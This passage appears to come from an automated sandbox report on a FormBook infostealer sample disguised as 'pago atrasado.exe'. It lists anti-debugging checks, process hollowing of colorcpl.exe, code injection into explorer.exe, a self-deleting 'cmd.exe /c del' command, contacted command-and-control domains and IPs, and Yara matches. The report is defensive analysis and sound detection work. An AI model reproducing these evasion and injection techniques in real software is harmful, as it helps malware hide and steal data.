Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456F0BF mov ecx, dword ptr fs:[00000030h] 16_2_0456F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h] 16_2_0456F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h] 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045790AF mov eax, dword ptr fs:[00000030h] 16_2_045790AF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04557D50 mov eax, dword ptr fs:[00000030h] 16_2_04557D50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h] 16_2_0455B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04573D43 mov eax, dword ptr fs:[00000030h] 16_2_04573D43
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B3540 mov eax, dword ptr fs:[00000030h] 16_2_045B3540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h] 16_2_0453B171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h] 16_2_0455C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453C962 mov eax, dword ptr fs:[00000030h] 16_2_0453C962
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539100 mov eax, dword ptr fs:[00000030h] 16_2_04539100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608D34 mov eax, dword ptr fs:[00000030h] 16_2_04608D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h] 16_2_04543D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453AD30 mov eax, dword ptr fs:[00000030h] 16_2_0453AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456513A mov eax, dword ptr fs:[00000030h] 16_2_0456513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045BA537 mov eax, dword ptr fs:[00000030h] 16_2_045BA537
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h] 16_2_04564D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 mov eax, dword ptr fs:[00000030h] 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 mov ecx, dword ptr fs:[00000030h] 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045E8DF1 mov eax, dword ptr fs:[00000030h] 16_2_045E8DF1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0453B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045C41E8 mov eax, dword ptr fs:[00000030h] 16_2_045C41E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h] 16_2_0454D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562990 mov eax, dword ptr fs:[00000030h] 16_2_04562990
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h] 16_2_0456FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A185 mov eax, dword ptr fs:[00000030h] 16_2_0456A185
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455C182 mov eax, dword ptr fs:[00000030h] 16_2_0455C182
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562581 mov eax, dword ptr fs:[00000030h] 16_2_04562581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h] 16_2_04532D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h] 16_2_04561DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h] 16_2_045B51BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h] 16_2_045661A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045635A1 mov eax, dword ptr fs:[00000030h] 16_2_045635A1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B69A6 mov eax, dword ptr fs:[00000030h] 16_2_045B69A6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608A62 mov eax, dword ptr fs:[00000030h] 16_2_04608A62
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045C4257 mov eax, dword ptr fs:[00000030h] 16_2_045C4257
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539240 mov eax, dword ptr fs:[00000030h] 16_2_04539240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h] 16_2_04547E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h] 16_2_0455AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457927A mov eax, dword ptr fs:[00000030h] 16_2_0457927A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454766D mov eax, dword ptr fs:[00000030h] 16_2_0454766D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h] 16_2_045EB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h] 16_2_045EB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h] 16_2_0453AA16
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h] 16_2_0453AA16
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04553A1C mov eax, dword ptr fs:[00000030h] 16_2_04553A1C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h] 16_2_0456A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h] 16_2_0456A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h] 16_2_0453C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h] 16_2_0453C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h] 16_2_0453C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04568E00 mov eax, dword ptr fs:[00000030h] 16_2_04568E00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04548A0A mov eax, dword ptr fs:[00000030h] 16_2_04548A0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045EFE3F mov eax, dword ptr fs:[00000030h] 16_2_045EFE3F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453E620 mov eax, dword ptr fs:[00000030h] 16_2_0453E620
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h] 16_2_04574A2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h] 16_2_04574A2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04578EC7 mov eax, dword ptr fs:[00000030h] 16_2_04578EC7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045636CC mov eax, dword ptr fs:[00000030h] 16_2_045636CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562ACB mov eax, dword ptr fs:[00000030h] 16_2_04562ACB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045EFEC0 mov eax, dword ptr fs:[00000030h] 16_2_045EFEC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562AE4 mov eax, dword ptr fs:[00000030h] 16_2_04562AE4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045616E0 mov ecx, dword ptr fs:[00000030h] 16_2_045616E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608ED6 mov eax, dword ptr fs:[00000030h] 16_2_04608ED6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045476E2 mov eax, dword ptr fs:[00000030h] 16_2_045476E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h] 16_2_0456D294
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h] 16_2_0456D294
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h] 16_2_04600EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h] 16_2_04600EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h] 16_2_04600EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CFE87 mov eax, dword ptr fs:[00000030h] 16_2_045CFE87
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0454AAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0454AAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456FAB0 mov eax, dword ptr fs:[00000030h] 16_2_0456FAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h] 16_2_045352A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B46A7 mov eax, dword ptr fs:[00000030h] 16_2_045B46A7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608F6A mov eax, dword ptr fs:[00000030h] 16_2_04608F6A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453F358 mov eax, dword ptr fs:[00000030h] 16_2_0453F358
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453DB40 mov eax, dword ptr fs:[00000030h] 16_2_0453DB40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454EF40 mov eax, dword ptr fs:[00000030h] 16_2_0454EF40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h] 16_2_04563B7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h] 16_2_04563B7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453DB60 mov ecx, dword ptr fs:[00000030h] 16_2_0453DB60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454FF60 mov eax, dword ptr fs:[00000030h] 16_2_0454FF60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608B58 mov eax, dword ptr fs:[00000030h] 16_2_04608B58
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455F716 mov eax, dword ptr fs:[00000030h] 16_2_0455F716
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F131B mov eax, dword ptr fs:[00000030h] 16_2_045F131B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h] 16_2_045CFF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h] 16_2_045CFF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h] 16_2_0456A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h] 16_2_0456A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456E730 mov eax, dword ptr fs:[00000030h] 16_2_0456E730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0460070D mov eax, dword ptr fs:[00000030h] 16_2_0460070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0460070D mov eax, dword ptr fs:[00000030h] 16_2_0460070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h] 16_2_04534F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h] 16_2_04534F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h] 16_2_045B53CA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h] 16_2_045B53CA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045737F5 mov eax, dword ptr fs:[00000030h] 16_2_045737F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h] 16_2_045603E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04548794 mov eax, dword ptr fs:[00000030h] 16_2_04548794
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\pago atrasado.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00409B30 LdrLoadDll, 1_2_00409B30
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10009B50 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_10009B50

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.crisisinterventionadvocates.com
Source: C:\Windows\explorer.exe Domain query: www.ttemola.com
Source: C:\Windows\explorer.exe Network Connect: 208.91.197.27 80
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Network Connect: 46.101.121.244 80
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.134 80
Source: C:\Windows\explorer.exe Domain query: www.baybeg.com
Source: C:\Windows\explorer.exe Domain query: www.everythangbutwhite.com
Source: C:\Windows\explorer.exe Domain query: www.highvizpeople.com
Source: C:\Windows\explorer.exe Domain query: www.itskosi.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.oddanimalsink.com
Source: C:\Windows\explorer.exe Domain query: www.ishhs.xyz
Source: C:\Windows\explorer.exe Domain query: www.sfcn-dng.com
Source: C:\Windows\explorer.exe Domain query: www.umgaleloacademy.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\pago atrasado.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\pago atrasado.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\pago atrasado.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\pago atrasado.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Users\user\Desktop\pago atrasado.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\pago atrasado.exe Memory written: C:\Users\user\Desktop\pago atrasado.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\pago atrasado.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\pago atrasado.exe Thread register set: target process: 3472
Source: C:\Users\user\Desktop\pago atrasado.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 3472
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\pago atrasado.exe Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
Source: explorer.exe, 00000002.00000000.275805694.00000000089FF000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000000.281510605.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100098CF cpuid 0_2_100098CF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10012E00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_10012E00
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_004030FB

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY